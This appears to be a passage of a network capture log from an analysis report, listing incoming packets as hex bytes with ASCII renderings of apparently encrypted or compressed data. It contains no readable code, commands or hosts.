2023-10-03 20:34:59 UTC	2033	IN	Data Raw: a3 6d 83 bd 69 b3 16 6c f2 3e 05 9a 26 26 cb 9e 2b 00 aa f9 1b 5c ff 96 0e e9 f3 1b 2e 46 ce db 0b 41 67 50 12 00 8f 25 31 30 63 42 d3 ce f5 cd 25 d9 2e 5c 66 4f cd 0e 04 eb 59 7c 7b a6 df 67 cd 01 80 59 eb 97 05 5a 99 09 76 40 57 49 e4 bd bd 5f cd a6 54 68 bb 54 7d 86 41 32 fb 2f 52 a7 a9 6e ad b1 ec 68 76 85 50 07 42 96 f2 60 ae b8 af 75 c1 f5 f3 e6 b6 20 84 63 f6 e0 a8 06 91 a3 a1 3d 5c 43 d5 df e5 52 75 1c 7e 2c 8b ee 5e de 03 81 40 6d 46 4e a9 1a ff 75 82 d6 27 1d 6f 0e ec fb f6 c8 be 49 0e 43 d8 2f 06 b0 7e b7 d3 ef 8b f0 36 22 07 fa e1 9a 0b 10 37 ab 0a d3 22 19 2e 50 9b 10 72 65 c0 77 e0 93 70 7d b2 05 f4 58 50 ab d8 2e 5f 57 54 4e fc c5 75 a6 6d 12 06 ef d6 c0 f6 5b de 73 00 db be d0 36 a0 ed 8c c2 c0 cc de de 3e 38 6e fc cb 05 16 ad 0e 10 00 14 Data Ascii: mil>&&+\.FAgP%10cB%.\fOY\|{gYZv@WI_ThT}A2/RnhvPB`u c=\CRu~,^@mFNu'oIC/~6"7".Prewp}XP._WTNum[s6>8n
2023-10-03 20:34:59 UTC	2049	IN	Data Raw: 06 6a 57 53 11 64 25 a8 c2 7f 2b 7a 70 10 98 38 b7 74 16 83 e3 fa df af 33 18 ad 25 58 c1 f1 bb a3 a0 89 0e 4e 12 25 2c 49 d0 7e 94 3c fc 46 83 39 3c 8e c3 e1 61 68 21 7d 9d 7f 2b 7c 6d e9 70 bb 07 1f e8 43 93 59 43 95 25 33 8c af af bd 87 f7 0f 4d c1 0d 30 7e 54 fa 8d a0 aa 96 49 44 1c c2 7c 8a 5e 21 6f db 87 1e 47 0a f3 3d 91 ae 25 dc 3a 3e 58 2e 46 6a 7d 20 61 b3 e3 a8 4a 13 3a 83 0c 33 58 cd 80 82 ef a3 14 1c f2 e2 e5 28 e2 1b a9 49 9f f0 a1 24 90 e1 45 d3 a1 9b 47 27 53 98 84 a9 b3 f5 86 e5 af 93 1d 41 8b 47 0f d6 f5 ef cc ef 3d 21 4e 1d a5 83 a9 a3 a2 97 c5 73 e9 93 fa 35 84 91 49 c6 57 cd da 35 87 4b 2b 5e 1d da 4e 06 ac ff 63 7b 9d 1a d1 bf 19 c5 95 ac e5 14 39 fa 89 18 4c ee e2 6a dc a1 f4 aa d3 e5 66 04 77 58 97 c0 84 1f 71 de 85 f6 df b7 4b eb Data Ascii: jWSd%+zp8t3%XN%,I~<F9<ah!}+\|mpCYC%3M0~TID\|^!oG=%:>X.Fj} aJ:3X(I$EG'SAG=!Ns5IW5K+^Nc{9LjfwXqK
2023-10-03 20:34:59 UTC	2065	IN	Data Raw: 38 b6 43 59 f0 cd 68 a6 d9 7a a5 be 4b 25 6d eb 27 97 02 74 87 25 59 94 a6 51 67 13 9a de 20 80 bd 2f 0b 36 71 ca 7c 7b f7 53 ba 95 53 30 62 df 04 30 f1 6c 31 a4 4e 97 e7 1d f1 74 d7 48 f2 75 cc 57 ed f4 b7 17 b2 09 f3 89 08 49 dc 81 c1 6a 9a bb 0c 56 b1 57 9a af d0 a8 fc dc 94 96 99 2d 40 6b ea e8 3e 99 a2 49 3b 7e 3f da d5 06 39 fa d2 84 01 b7 b4 22 07 ad ee 63 1d 80 26 cc 01 b5 66 e8 0e b8 47 bb 62 ca 57 c9 9d 7e 93 59 b6 27 d9 ed e4 bb ac 15 b8 a1 67 21 0b 4f d4 a5 3b 6d 20 58 ae 93 f5 2a 77 7e c0 dd d5 ca 18 5f b9 9e e1 0e 86 60 1f c8 27 fe 15 3a b6 15 c0 a0 29 80 0a 5e 13 9b d7 8a b8 ab 63 f0 04 c7 df b3 1d 91 55 72 33 8c 27 c3 b6 bf c2 0c 76 1b b1 1f a7 43 b9 95 9a 1a e7 cb e2 92 f2 e6 15 f8 61 9a 41 a9 4a 0a ab 72 bd 98 6e 76 28 0e 7f d5 f3 83 fc Data Ascii: 8CYhzK%m't%YQg /6q\|{SS0b0l1NtHuWIjVW-@k>I;~?9"c&fGbW~Y'g!O;m X*w~_`':)^cUr3'vCaAJrnv(
2023-10-03 20:34:59 UTC	2081	IN	Data Raw: ca 2a 9d b3 b2 84 eb c9 2c c5 de e7 29 e7 c8 bc c7 d4 98 f0 ad 1d 7f db 14 65 53 cd 63 a6 ae 98 85 ad 55 b5 e6 50 b0 d2 a8 a5 7e 43 6f f2 f8 21 1a 3d f5 dc 87 2f bf 26 67 01 86 e5 22 1d 45 33 25 c7 87 53 e7 99 c7 c2 bc ef 9d ab 11 69 02 d0 f3 33 b8 82 cc cf e0 07 27 b5 46 84 d2 90 84 b1 24 8a ab 7e 90 6d a6 f6 2e 41 51 2b 9f 47 3e d3 06 f5 b6 d4 b4 68 4d 78 54 19 21 0c ec 7c e3 4c 20 f1 66 a4 fe 25 dc f9 a9 67 09 2a 9f d7 1e 55 8b 3a 06 3b 6c 4d 40 23 d3 60 a2 7e 83 84 09 a8 7f 49 47 31 5f c8 51 ae 15 30 27 b2 b8 2a 91 53 19 50 41 32 77 5d 39 a2 09 d2 3d 39 df a4 d6 42 b0 d3 0b 01 73 aa f0 d8 aa e5 a2 4d 29 8f 2b f0 1f 63 1e c9 ba e2 4f bb fa 65 f3 2c 7e b2 9c b8 e5 a7 22 63 72 2a de 6a 97 b8 3b bb 04 dd 44 34 ca 80 f3 33 b8 c2 cc c3 36 10 d8 e3 b7 a4 74 Data Ascii: ,)eScUP~Co!=/&g"E3%Si3'F$~m.AQ+G>hMxT!\|L f%gU:;lM@#`~IG1_Q0'SPA2w]9=9BsM)+cOe,~"crj;D436t
2023-10-03 20:34:59 UTC	2097	IN	Data Raw: 95 bc a2 4b 09 6c a2 b7 c5 4f 8b f9 bf 7e 3b dc 23 4f 87 2b 5b 8b c9 3e be 4e 25 2a 27 95 13 cd 3f 26 80 72 12 6a 92 92 7a 92 42 ad 74 3d 2d 2c 3f 4b 48 65 a0 00 64 f2 29 a4 62 17 ff 57 8e 55 2c 80 11 23 ba 56 31 45 14 8c a2 56 a5 7b 4a 8f f9 60 f2 91 05 e5 17 9d a8 17 29 f3 b4 31 1e 94 2f c9 82 16 fc bb c0 ec 37 5d 10 a8 87 8a 09 e4 73 e2 e9 c1 8f 8d fe 5b 34 11 94 42 3f 8b 66 43 f7 c2 0a 57 b2 96 fb b8 e1 5c 38 66 63 d3 4e 7c e9 1b 63 23 6d b5 83 b2 ab b3 71 09 05 17 27 8b 74 e2 ff 04 c3 02 a7 85 76 24 3b 49 98 92 4c e1 8b 7e df c4 6c df a5 24 a3 1d 8a 42 22 7c cf 55 f8 a4 90 4e f9 9e 82 b2 c4 98 bc b2 ce 64 be 56 b9 99 52 29 76 2e df 97 ab 46 eb 91 9e 88 4a fb 77 3a 98 62 e4 46 34 7f fc e0 43 fa 1e a9 1f 79 68 09 47 d0 f7 c8 59 b2 da 85 a0 1c 36 d7 c9 Data Ascii: KlO~;#O+[>N%*'?&rjzBt=-,?KHed)bWU,#V1EV{J`)1/7]s[4B?fCW\8fcN\|c#mq'tv$;IL~l$B"\|UNdVR)v.FJw:bF4CyhGY6
2023-10-03 20:34:59 UTC	2113	IN	Data Raw: 11 b1 6c 34 dd 3a 69 ac 4a 33 47 fe b1 c6 a3 9d 65 23 cd 90 9b 41 d2 c3 db 2c a7 c8 b7 a7 65 1d 32 86 db 1b f2 f0 56 21 b6 4c 97 a8 77 27 7b 77 e4 f2 c5 09 79 98 76 69 94 ec 1d 3e 37 fe 4f f9 ea cb 55 68 67 28 e5 93 71 d3 a0 6d 94 ee 65 0c cf 56 a0 af 37 ce 67 d4 dd b3 75 d1 36 bb 19 90 d8 5b 5f 78 73 a5 26 51 30 26 07 d6 1c 13 bb e8 cc ec 2a e6 3e d2 af 5d 74 bf ba d5 ba 9e d2 c2 ed 76 9b df 79 c6 f9 a7 64 a8 81 1a c3 b1 7e 13 b6 d0 ec 3e ab 34 a5 d1 d9 db 3d a4 e6 4f c9 14 14 9f 1e e0 17 81 e9 f1 e5 4e 3a 32 d1 d1 f4 a0 76 4f ea b5 b4 4c 4e 2a 56 c4 58 34 14 bc 33 a1 73 52 d3 5a ec 96 66 62 da d4 e9 9a 03 36 4d ed 68 08 da 3e e6 78 a2 e8 37 76 e5 22 89 b0 cc 15 c1 2d 58 70 05 a5 58 73 01 d9 0c 3b bb 95 c6 2d e3 9b 4d 41 59 6a b8 fe 7c 4a 8a da 3a 14 a8 Data Ascii: l4:iJ3Ge#A,e2V!Lw'{wyvi>7OUhg(qmeV7gu6[_xs&Q0&>]tvyd~>4=ON:2vOLNVX43sRZfb6Mh>x7v"-XpXs;-MAYj\|J:
2023-10-03 20:34:59 UTC	2129	IN	Data Raw: d9 07 ce 27 da e8 78 c4 c1 46 11 ee e6 f4 38 bc d5 ec 1c 31 6e 27 af e5 83 cf 5e db a7 e8 fc c5 c5 c9 db 87 7b 37 b7 4c 18 9b a9 96 cb d5 b4 07 e2 57 05 c7 51 ce 22 d5 69 fb bb 65 ef 62 4a 5d 9e 17 70 25 78 4c bb 1c 52 a2 35 03 8b 51 5a d1 79 96 6e 29 8f 0c cd d5 30 61 37 94 da 36 5b 2c e7 fa d6 da ef 61 1a 5e 96 f7 90 da f6 ed e6 03 32 cc 66 5b a5 98 74 e9 44 e1 9f 18 5c 1c 1e f7 e6 7a bb 3e dd 8d d9 21 9a 62 6d e1 4f 6c 97 e9 f8 b6 ce ca a2 96 3e 63 c7 e9 95 ea 29 2e 4c a2 9d be 21 84 42 74 af d5 98 18 17 b4 a7 bc 26 d0 cd 78 83 91 f3 a1 bb eb b7 e5 a8 e4 c7 55 fc f2 f4 fa b2 9c 92 08 fb 1a 7c ea 65 de 09 ea 73 6f 48 97 fa ee a5 e2 30 a6 09 81 75 d9 30 3b cf 23 5b c5 fb f9 12 6b 57 cc a7 95 9d 1d 10 34 d1 79 6b 13 eb 1e 2c eb 89 e6 a1 c7 f3 8e 46 20 49 Data Ascii: 'xF81n'^{7LWQ"iebJ]p%xLR5QZyn)0a76[,a^2f[tD\z>!bmOl>c).L!Bt&xU\|esoH0u0;#[kW4yk,F I
2023-10-03 20:34:59 UTC	2145	IN	Data Raw: 6e 56 f8 18 3a 58 6f 83 cb 19 bb 73 45 05 be 07 b7 08 4a 1c 46 33 8c c1 bc 13 46 e9 dd df c9 09 dc 40 ce b0 48 b4 90 f3 72 d2 e5 ab 3f 37 bd 46 e8 48 3b f3 4a b5 3d 84 c5 3e 56 04 38 b8 22 13 c9 4b 42 80 8e 0c 55 f9 24 af 16 c6 68 c6 e6 f7 26 f4 42 f2 2e d5 97 7b f6 7a 1d a9 8a 39 f0 3b 9d 4f 97 52 7a 90 36 6e 5d 79 e1 2d 2d 2b c4 b1 45 2c 11 b2 f6 64 c2 23 0d 59 ae 9f ca 88 cc 0e 41 0a 59 ed bd 96 e6 e7 61 b5 b4 dc a6 6a 88 6d d3 5a 1b 17 be fc 35 44 7b 22 48 b9 23 48 a2 f7 88 07 7c d2 6d be 25 0c 98 7e b7 d2 f2 5a dc 35 e5 91 5f 93 5d d2 bb 8d 0b ce 30 10 e4 d1 d8 fe d8 74 de 92 8e b2 76 17 27 b8 c7 d3 51 82 36 59 3b 77 14 8d a4 c6 e7 2c c4 ae c0 87 99 c7 3d 30 ad c8 ef 74 fb bc e9 1d 5a 1a 36 fe 0c 01 68 45 32 4d ab 82 7e 6e 44 85 c7 a9 10 92 77 4b 87 Data Ascii: nV:XosEJF3F@Hr?7FH;J=>V8"KBU$h&B.{z9;ORz6n]y--+E,d#YAYajmZ5D{"H#H\|m%~Z5_]0tv'Q6Y;w,=0tZ6hE2M~nDwK
2023-10-03 20:34:59 UTC	2161	IN	Data Raw: 8b a4 6c 42 fc 03 8a 32 0e 54 1c a6 31 7a 2c 00 10 2b e6 28 28 8b 6f cc cf 01 cc 28 c8 20 9f 57 9d 3b 47 d4 e9 00 54 af c7 22 03 52 61 90 0c 01 a7 e3 c7 14 1f 92 73 06 a9 7c 95 e9 41 09 90 ec fe 21 27 ac 64 ca 86 d2 9c 98 54 13 57 f5 4f 06 fd 03 2a c7 4d 65 e4 f2 39 86 55 7e df 92 b1 59 58 d8 79 76 6e 92 70 07 7b 9c 09 97 5f 28 b3 ea f9 11 e8 94 98 2f c0 13 00 2a 50 22 07 8a 9e e6 3b 07 1b 61 5d b5 5b 44 7b 54 4f c5 ba e1 65 f9 d8 00 f5 b9 22 62 30 42 ef 48 40 85 69 b0 a3 9f 0f b0 2e 91 ad f6 e5 8b 53 38 62 3f ed d4 9b 98 11 34 4f ea 7c 5a 6e 45 d9 48 a2 2b 44 54 cc 82 e4 9c 1d 0f 3b b0 f4 e8 31 64 47 34 28 38 fb e5 f3 71 87 7c 1a 25 d2 b4 ab b1 fd df 65 8e 2e 9b b9 f2 97 e9 34 3a 29 58 a9 51 43 2a 2e 9e 4d 86 d2 c4 37 c7 b2 0f 9a b7 a7 3f 48 81 50 81 9e Data Ascii: lB2T1z,+((o( W;GT"Ras\|A!'dTWOMe9U~YXyvnp{_(/P";a][D{TOe"b0BH@i.S8b?4O\|ZnEH+DT;1dG4(8q\|%e.4:)XQC*.M7?HP
2023-10-03 20:34:59 UTC	2177	IN	Data Raw: 56 93 0a 92 a0 b9 2d 9c 9e a5 4f 17 9e d7 a1 1f 71 d5 dd 13 42 4f a2 6e 6a f8 b5 af d5 a0 d8 9f fa de a0 3c af 2d b2 f5 9a 07 2e 86 1e 97 fc 49 9a 2f 7b d5 17 0d 0c c2 53 3f bc c6 4d 63 8e 47 3c 52 bd 4a 0c 30 1a 97 76 67 cd bb a0 77 13 2c a2 7b ff f2 e9 fd f1 45 45 e2 51 a8 5b 3f 5c b6 58 a4 93 9e 8d 20 cc bc fb b6 d5 be fb e1 81 b4 42 9a 4b 37 f5 1b 49 7b a7 56 f5 ba 87 65 2e 8a 32 74 82 b6 bc 11 9e 21 ff fb 7b 6c 71 66 4f 3c 27 01 f4 6a d2 fe 30 65 8e fc 5e 20 c2 7e d4 38 f6 f0 ba 73 9f fe 69 17 10 2f 35 58 b1 5a 0a 00 ec 6f 89 71 00 de 86 67 8c 06 e0 05 54 40 10 09 14 57 20 4b 45 c4 76 cc ec f0 37 3e 78 69 b9 a3 c9 12 6b 6b 6f a0 49 41 b7 81 6f bd c8 bc a2 eb de c5 e2 47 bc 46 44 a2 82 60 45 16 de 98 40 19 10 d0 27 a2 fa b0 94 7d c8 e0 7a d6 db e2 31 Data Ascii: V-OqBOnj<-.I/{S?McG<RJ0vgw,{EEQ[?\X BK7I{Ve.2t!{lqfO<'j0e^ ~8si/5XZoqgT@W KEv7>xikkoIAoGFD`E@'}z1
2023-10-03 20:34:59 UTC	2193	IN	Data Raw: 00 c1 03 a7 ec 00 ad f5 66 a0 0e 00 ac a0 16 5b 67 f7 45 84 39 46 ba ee ad ab c5 5a 2b b7 bc 68 a5 4f eb bd 2b b9 59 bb 3c dc e5 6e b2 3f 6c 01 88 96 d8 81 52 7d 7c 3d 73 89 38 1e 9a d1 ac 70 48 b0 ba 7b 08 9e e7 fc 76 c9 1e e6 1f 69 f9 40 78 a1 89 cf ed e4 02 79 1b 7f bb bc 5c 33 77 55 54 7b de 6b 65 bf 08 68 5e 6a 6f 34 a9 be 52 b5 9e cf ce 8b 05 3b ae 3a 37 e2 c8 5d 80 ac d7 e9 d5 96 b0 03 b0 35 96 b3 3b a2 64 aa 37 fe 7d 4f 71 b0 c4 bb 13 13 7e dc 38 0d 70 1e 5b 7c a7 fc 8d 7a 5d 12 bb 36 df f4 bd a4 22 73 a5 6a bd ca 75 7b c5 91 ec 2b 31 6e 67 54 5e c3 c7 d3 fa d8 60 1c 37 7f ac f9 36 0f 0f a2 cd fd 28 23 25 72 17 e2 98 73 4e bf b3 0a 69 a7 cf 55 29 6c 4d ab c6 c2 b7 4a 2d 42 96 e7 72 c5 fe ae 7f 30 81 c8 64 ad b6 6c a5 5e e7 85 73 3d d4 3c 63 1e 0f Data Ascii: f[gE9FZ+hO+Y<n?lR}\|=s8pH{vi@xy\3wUT{keh^jo4R;:7]5;d7}Oq~8p[\|z]6"sju{+1ngT^`76(#%rsNiU)lMJ-Br0dl^s=<c
2023-10-03 20:34:59 UTC	2209	IN	Data Raw: 16 ec 9f 03 0c ca 1f 55 a3 dd 3d aa a7 9b 8b 0e e0 b3 e7 18 09 f2 40 9e 0f 53 79 60 0f cf a8 1b 97 93 cd b5 23 b9 76 dc d8 c3 6d a6 57 71 d6 2f b2 9f ce 2f 6b 7c 55 7f ba 6f 9e f3 d9 f2 78 09 93 d1 4d 20 03 b7 76 b7 ed 92 89 18 e9 b7 44 78 b8 d8 60 60 2e 30 ee b3 78 e6 ff d7 6a 3e 77 44 64 c4 5f 98 04 10 7c d4 d4 3f 93 43 f9 da 94 ec 56 97 54 99 31 28 f5 d1 f8 26 df 76 26 0c 79 4c 9c af 74 9b c6 16 08 04 3c 05 be 55 d9 26 4a 49 82 a5 58 f7 4d 3e ac e9 e0 3d d2 fd e4 ee b4 2f d3 1c 14 0d b6 f7 26 c2 24 98 f8 87 b1 83 e8 d2 30 1e 3d 44 80 a7 39 e5 9f 0b b1 53 96 48 6e 15 c9 18 73 fc 74 01 41 c6 0a 7d dd f5 fd 2b 84 8f 1b 17 3b cf 81 92 01 29 53 bb 72 aa ce 16 5c 14 51 7e aa b2 de 58 02 a5 e7 ca bd 62 6c 0e df fc 83 46 91 e1 95 ca d3 a3 42 84 04 4a 85 50 b4 Data Ascii: U=@Sy`#vmWq//k\|UoxM vDx``.0xj>wDd_\|?CVT1(&v&yLt<U&JIXM>=/&$0=D9SHnstA}+;)Sr\Q~XblFBJP
2023-10-03 20:34:59 UTC	2225	IN	Data Raw: d2 69 58 8e 18 95 7e 1a 87 e8 07 54 a9 60 df 1b 33 b3 10 82 65 5b 40 74 ff 4d e2 0b 13 71 14 d2 3c 51 f2 ce 11 ec 3d c5 50 00 b3 c0 8f 9a fc 04 e1 20 49 5d 28 01 8d 60 a2 47 0f 1e ec 46 31 b4 77 cc f7 67 99 5d 4b a5 38 91 47 d2 d3 1e b1 c9 0e 6a 01 9c d7 a7 73 e8 11 1f e7 af 93 3d ab 95 76 5a 87 64 11 68 53 94 a8 8d 8d d9 2c 71 26 6c 0b 60 ea c6 4d 6d 02 74 e9 db c9 6d ea e0 99 d6 4d 58 69 a0 7b 82 a6 67 99 f7 62 da 35 72 98 97 cb 58 07 f1 1c b3 2e 82 6e 78 c8 ca c9 3a e3 40 6a d3 c5 61 a3 73 17 b5 63 5a 29 04 f8 17 1a be 0b 3d 75 c7 71 a0 49 26 8a 76 46 79 64 c0 ad 08 47 1b c7 98 cd 8a d6 e7 ca 8b 1e 3e 5e c1 97 58 43 bb ea 0b 38 7c 78 e0 2c 56 85 f0 45 ed c2 48 b4 78 78 1f a7 31 b4 a3 36 57 5f 28 b1 f2 5d e8 c6 ae 8c a7 23 61 a5 4a 36 95 40 11 e5 b6 76 Data Ascii: iX~T`3e[@tMq<Q=P I](`GF1wg]K8Gjs=vZdhS,q&l`MmtmMXi{gb5rX.nx:@jascZ)=uqI&vFydG>^XC8\|x,VEHxx16W_(]#aJ6@v
2023-10-03 20:34:59 UTC	2241	IN	Data Raw: cd 16 c9 44 9d 41 7e 4a 1d 2d ca 54 8a 2d d8 6e 36 8b 7d bb a0 f9 42 17 aa d3 51 53 d6 8b a3 2f 20 e3 cb 07 77 f5 7d df bf a0 ec af 45 13 75 fe e7 39 ca 84 84 fe 69 8f 48 e0 95 b7 04 72 0f 89 12 62 0a 4f 75 8b 7a 15 7b 70 2a 7b f3 55 f4 8f f1 63 4b 3e e9 ab 14 1a 86 1f 24 b4 a5 0f 02 b1 74 7a 27 38 74 93 32 46 48 89 84 dd c3 36 98 21 56 dc 52 a9 6f 01 ea 98 73 92 8e 13 75 b1 66 50 41 84 5e ea 3b 12 7b 89 45 2c b2 48 29 db 18 85 4a e2 16 66 d4 14 75 77 41 63 10 5f 39 34 04 5f ee 65 a5 04 1b dd 26 ea 51 31 62 01 c9 66 08 c1 72 13 db 73 f4 b9 a4 77 69 9a d5 a4 17 e6 0e 1e 76 e3 53 92 b7 fa f6 50 bb 56 d3 38 06 75 f7 35 34 6f 2c d4 09 b7 11 40 e9 ee 73 7d a5 43 4e b6 78 f3 7c 56 bb 3b 58 ae 7c bd 86 dd a9 cb 86 31 2c 21 fe f3 84 9d 2f 5e 89 0a ec 1b a9 dc 45 Data Ascii: DA~J-T-n6}BQS/ w}Eu9iHrbOuz{p*{UcK>$tz'8t2FH6!VRosufPA^;{E,H)JfuwAc_94_e&Q1bfrswivSPV8u54o,@s}CNx\|V;X\|1,!/^E
2023-10-03 20:34:59 UTC	2257	IN	Data Raw: 1d b5 e6 4e 4a 28 bc 62 71 e9 d3 90 72 62 4d 58 7c a4 70 45 fc 9f 32 56 8a 8f 10 a6 2e d3 bf 32 f5 59 f9 e5 ca 3f e5 87 90 0a df 43 b0 06 80 78 c5 00 6b 05 57 75 52 24 17 37 29 2a e6 49 fd cc f5 b9 e7 b4 26 74 2e 15 38 09 b6 35 d5 b9 34 71 00 3c 0d d2 ea c4 6c b8 ec bf 9d 5d e1 8a bf 34 79 f2 37 13 a1 97 81 52 f5 d8 6c 7c 87 9b 48 63 74 a7 85 a1 55 eb de 4d a5 aa 17 07 ad dd 62 12 a1 9f 5d 9d 79 5e 22 0a 9f 9e b3 7e c6 5e 15 7e f5 63 98 23 d3 44 8b 8f 82 ae 8c 5a 30 ce 67 56 44 09 25 19 08 ee dc fd 26 d8 d4 14 94 50 d8 82 84 43 b1 14 12 ef f3 9e 44 5f a1 a5 e6 14 8c 05 ac 94 b8 49 98 a8 fb 11 cb da 28 d5 16 6d 00 59 08 e5 8f 5d 1c b4 72 76 21 9d 58 3b 18 ca 0b 87 b0 c9 3f 9a f6 8e c7 fc f2 68 fc 7e f2 59 1c 22 2b da 52 e8 b6 26 88 2d 09 6b 83 f3 4d 1a 3f Data Ascii: NJ(bqrbMX\|pE2V.2Y?CxkWuR$7)*I&t.854q<l]4y7Rl\|HctUMb]y^"~^~c#DZ0gVD%&PCD_I(mY]rv!X;?h~Y"+R&-kM?
2023-10-03 20:34:59 UTC	2273	IN	Data Raw: ff ee 35 7b 00 c7 52 cb d7 86 50 8c 5c aa 1a cc a3 84 c2 6f 35 1e 26 2b 83 36 b7 86 e0 ff 52 f5 19 16 6a 0c df 65 6c e4 36 2a b5 6c 03 9c 00 5e 10 36 15 02 3f 19 cc 77 3d 70 d7 9d 26 97 3e 1c 8c e6 22 4d 75 79 63 32 fb ff 56 17 2d 70 eb 3f 56 2e c2 40 3c 75 0f 06 43 1b 12 45 65 26 e6 a4 2a ef 5d 3a e8 69 62 27 6b 12 e1 a2 d2 38 7a 9b b4 79 60 d0 5d 19 e4 c5 27 b3 1d 10 27 0b 17 b1 0c 43 50 63 1e 2b dd 95 56 99 63 8d 0b 5c 1e d9 5e d6 89 7a b0 6e 3b 1e 59 f3 08 49 19 5a 71 e1 cf 3f ee da a0 ab c1 8e d9 7a 82 db ed 2c 34 05 ef bf 55 03 c3 73 04 1e fb 20 df 90 b0 2e b4 71 fd 71 f8 b8 e8 8d 5d aa 3c 5b e0 e4 fa e3 0e 22 c3 0c b0 8d 21 cd 6d 42 f7 7d 15 71 d3 0c 94 8f 1c 7b 0e 63 68 18 f5 63 b3 4f b6 3b 36 61 4d 55 d6 0a 65 70 ac c0 fb 45 2f 56 3c d4 88 e5 90 Data Ascii: 5{RP\o5&+6Rjel6l^6?w=p&>"Muyc2V-p?V.@<uCEe&]:ib'k8zy`]''CPc+Vc\^zn;YIZq?z,4Us .qq]<["!mB}q{chcO;6aMUepE/V<
2023-10-03 20:34:59 UTC	2289	IN	Data Raw: 71 41 97 5f 10 d3 25 4f b3 64 a5 89 72 5f d4 a2 a4 f4 8d e9 d6 81 7a 40 9b 91 92 fa 48 3f db 2f 39 bd ba 97 b8 6d d0 e9 ed 92 5c 38 bb 81 ba 45 1d 98 0f ef 19 8c f9 b4 f2 62 f7 45 c4 75 39 12 40 9d d1 72 f0 1c 19 49 26 d8 b8 cc 67 a6 2c 08 a9 1c cb a9 9d 0d 8e 84 1a c9 6e 9c 3a e5 2e b9 e5 3c 62 a6 9b a3 32 df 12 2c d8 ae ed 58 58 3c 0a 36 bf e4 bc 76 bf 16 5e 32 98 49 e7 33 55 30 49 82 85 c8 47 c4 4f 9b 94 cd 65 84 14 9a 8a 9d e6 d6 b2 97 d4 df 55 4e b9 5e 7f 07 ea a0 fe 56 6a c4 1d 44 9d 90 1f 8e 8f bf 7e 15 4a 43 01 b1 a1 92 2a 76 5f 22 aa cd 73 9e 56 8c 6d 58 0b ba 30 49 74 33 33 ab 79 42 12 a1 a5 05 50 07 f2 36 3f 44 86 25 b4 88 ba f9 ca a9 36 f8 5b 73 96 99 d4 ba b7 96 3a 30 d4 19 ed f6 c4 2d e3 ca 1b 0f 23 17 2f e4 f9 d9 0d b1 79 98 4c fa b2 92 da Data Ascii: qA_%Odr_z@H?/9m\8EbEu9@rI&g,n:.<b2,XX<6v^2I3U0IGOeUN^VjD~JC*v_"sVmX0It33yBP6?D%6[s:0-#/yL
2023-10-03 20:34:59 UTC	2305	IN	Data Raw: 26 eb 65 88 d1 7b 39 ee 7d ba e7 cc 7e 10 83 25 b4 5f a2 79 cb 2e e1 7c 52 32 b3 74 e3 7f b4 c7 b8 38 1f 45 5b 6c 24 5e bd 16 f5 78 76 fd bb 19 f8 f4 a1 e3 2e 50 9d a1 04 40 ad 39 c7 45 6c df fc 00 80 c0 16 38 94 1c 22 00 80 f0 eb ea 3e 5b cd 4e 1c 9e f8 9e 61 b4 8a f2 9f 0f 29 58 0a 93 7a 75 04 1f e8 3a c1 75 8f 11 59 dc 47 40 40 67 97 93 7a ce a6 d0 9f ee 7b 29 46 9f 41 27 34 8b c5 21 7c d9 46 93 62 36 0b 39 f9 14 72 64 83 ee 34 4e bc 3d be d9 f2 a1 5b 57 c9 1c ee bd 40 55 13 4f b4 33 93 f1 f1 4c e0 f0 48 89 3d f5 34 ca 35 26 8a ea 16 60 93 8d 8f da bc 47 96 59 4d 99 70 8e 38 26 77 2b 23 11 5f 0a 2b 28 c2 dc 4b 3d ff bf 21 8f 03 dd 5e 98 7c 74 b1 df b5 d7 71 47 d4 d8 67 b1 36 95 e5 44 7a 0d 9e 77 a6 4b 5a 9b d9 ef c5 66 e1 d5 38 b8 aa de 97 7d df f7 0a Data Ascii: &e{9}~%_y.\|R2t8E[l$^xv.P@9El8">[Na)Xzu:uYG@@gz{)FA'4!\|Fb69rd4N=[W@UO3LH=45&`GYMp8&w+#_+(K=!^\|tqGg6DzwKZf8}
2023-10-03 20:34:59 UTC	2321	IN	Data Raw: c0 38 f0 4f 5e 7a a5 88 2a 3d d3 bb d0 7b 86 76 86 85 a1 dc 60 5a 4e 96 7f 64 d6 ef 88 a8 ea 08 b1 57 3a 77 82 dc 7b 85 8e 61 17 ec 71 a8 8f 62 b5 0f e3 db fa 8e 50 96 a0 45 43 21 00 0b 3d 9f 2c f5 99 8b 34 45 25 2e 66 3c 90 a9 b0 46 9a da b1 b0 96 a9 98 14 10 d1 2d 6c 1a 87 5a d0 19 ff fc 5c 91 a1 34 7c 6a 42 67 ad be da 42 ac e7 64 a0 5c 46 6b 46 91 3a 8f 22 be d6 94 d6 e6 82 81 fd 08 cf 27 31 0d c5 21 5a ff 49 48 d6 8f e2 90 85 97 83 7e f4 53 1e 9f e7 17 94 d0 fe d8 87 7e f6 a6 82 fc 10 11 c2 aa fa 7e 6a 3f da 9d 16 94 f8 c3 bf 19 77 45 fd 46 d4 7f e6 7c d8 fe 5d 34 31 a3 fd bd 2f 96 aa 5e 54 f1 53 f8 48 8b 9c 7b f6 ed 0f 84 7e 10 0d 28 a1 14 7f 7a df 2d da 8b 77 b3 29 72 2f 97 ea b0 28 c6 b0 13 53 dc 29 c2 f6 99 cc 85 1a 93 ab bb e0 33 87 91 60 1e 0d Data Ascii: 8O^z*={v`ZNdW:w{aqbPEC!=,4E%.f<F-lZ\4\|jBgBd\FkF:"'1!ZIH~S~~j?wEF\|]41/^TSH{~(z-w)r/(S)3`
2023-10-03 20:34:59 UTC	2337	IN	Data Raw: 67 38 cf ec 2f 00 cc 58 fb 7c fb ed 49 be 69 20 8a 60 84 04 2f df 2f c8 6c 7a 4a ff 6e a5 14 9a 2f ca 2f 91 2f 63 2f fc 2f 2f 1e bc 66 50 bf cc be 38 bf e5 bf ae 1b c5 23 29 d0 7e ec cb 5f 31 22 27 fb 8f b5 8b 17 73 f3 fe 4f 6f 35 b9 fc f2 87 7f af 2e bc ff 8b 4c 36 fb dd fd fe fe d8 0d 7f a6 ef df d3 2e 38 c5 23 4b d2 4b ec 73 71 f1 04 8f 59 e2 c4 95 ff 94 c7 00 ae 8b 77 e7 40 72 06 04 c1 f3 27 df 6f 3f 66 30 aa bd a6 7b 37 5d f2 62 a5 a1 13 51 3e e2 aa 5d 3c ff 00 81 57 1b 28 e7 f6 61 8b 97 79 c3 fe 19 ab 71 10 c6 27 7f 22 87 1e 5e fd 95 44 30 e1 43 c6 23 b8 ad 7b 3d a2 1d e5 92 4c aa 20 04 c1 b6 f9 34 23 ea 78 54 b2 d0 a0 17 f4 09 a9 11 9e 5f 67 13 63 f0 d8 51 fc ae 34 4f 5e 9d 2b 97 a1 fe d4 49 26 30 b7 1f 